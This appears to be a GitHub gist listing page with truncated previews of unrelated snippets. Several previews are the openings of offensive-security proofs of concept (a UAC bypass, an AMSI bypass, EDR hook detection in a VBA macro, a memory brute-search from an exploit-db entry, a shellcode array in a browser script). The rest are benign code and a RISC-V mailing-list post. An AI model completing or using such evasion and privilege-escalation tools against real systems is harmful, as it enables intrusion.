This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
TaskManagerSecret | |
Author: @splinter_code | |
This is a very ugly POC for a very unreliable UAC bypass through some UI hacks. | |
The core of this hack is stealing and using a token containing the UIAccess flag set. | |
A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html | |
From there it uses a task manager "feature" to run a new High IL cmd.exe. | |
This has been developed only for fun and shouldn't be used due to its high unreliability. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import zlib | |
import io | |
import sys | |
PNG_MAGIC = b"\x89PNG\r\n\x1a\n" | |
def parse_png_chunk(stream): | |
size = int.from_bytes(stream.read(4), "big") | |
ctype = stream.read(4) | |
body = stream.read(size) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.cpu cortex-m3 | |
.syntax unified @ this is important, you won't get most of thumb-2 otherwise | |
.text | |
@ this file contains a assembly version of a lz decoder for cpse1 at the hogeschool utrecht | |
@ it's done in 15 instructions / 40 bytes, 20% less then what the best compiler did :) | |
@ compiler benchmarks | |
@ clang (trunk) | |
@ -O0 124 bytes |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// memBruteforce.cpp by aaaddress1@chroot.org | |
// brute search loaded moudules in memory | |
// rewrite from https://www.exploit-db.com/exploits/45293 | |
#include <Windows.h> | |
#include <iostream> | |
#pragma warning(disable:4996) | |
bool isMemExist(size_t addr) { | |
int retv; | |
__asm { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
function gc() { | |
for (var i = 0; i < 0x80000; ++i) { | |
var a = new ArrayBuffer(); | |
} | |
} | |
let shellcode = [ | |
// Move x18 to x28 (TEB) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Markku-Juhani O. Saarinen <mjos@pqshield.com> | |
Apr 11, 2021, 9:32 PM (2 days ago) | |
to Tech-crypto-ext@lists.riscv.org, tech-bitmanip@lists.riscv.org. | |
Hello Bitmanip and Krypto, | |
A colleague asked: "Why CMOV is not on the constant-time Zkt list -- the Bitmanip specification says that it is helpful for cryptography?" https://github.com/rvkrypto/riscv-zkt-list |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <intrin.h> | |
#include <string> | |
#include <TlHelp32.h> | |
#include <psapi.h> | |
DWORD WINAPI Thread(LPVOID lpParam) { | |
// Insert evil stuff | |
ExitProcess(0); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Runtime.InteropServices; | |
namespace AMSIBypass2 | |
{ | |
class Program | |
{ | |
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); |
NewerOlder